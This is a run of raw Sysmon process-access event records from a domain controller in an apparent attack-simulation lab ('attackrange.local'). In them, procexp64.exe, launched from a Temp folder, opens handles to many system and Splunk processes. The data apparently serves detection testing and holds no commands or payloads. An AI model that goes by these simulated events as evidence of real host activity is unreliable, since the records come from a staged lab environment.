10341000x8000000000000000787047Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787046Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787045Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787044Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787043Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787042Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787041Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787040Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787039Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787038Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787037Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787036Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787035Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787034Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787033Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787032Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787031Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787030Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787029Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787028Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787027Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787026Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787025Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787024Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787023Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 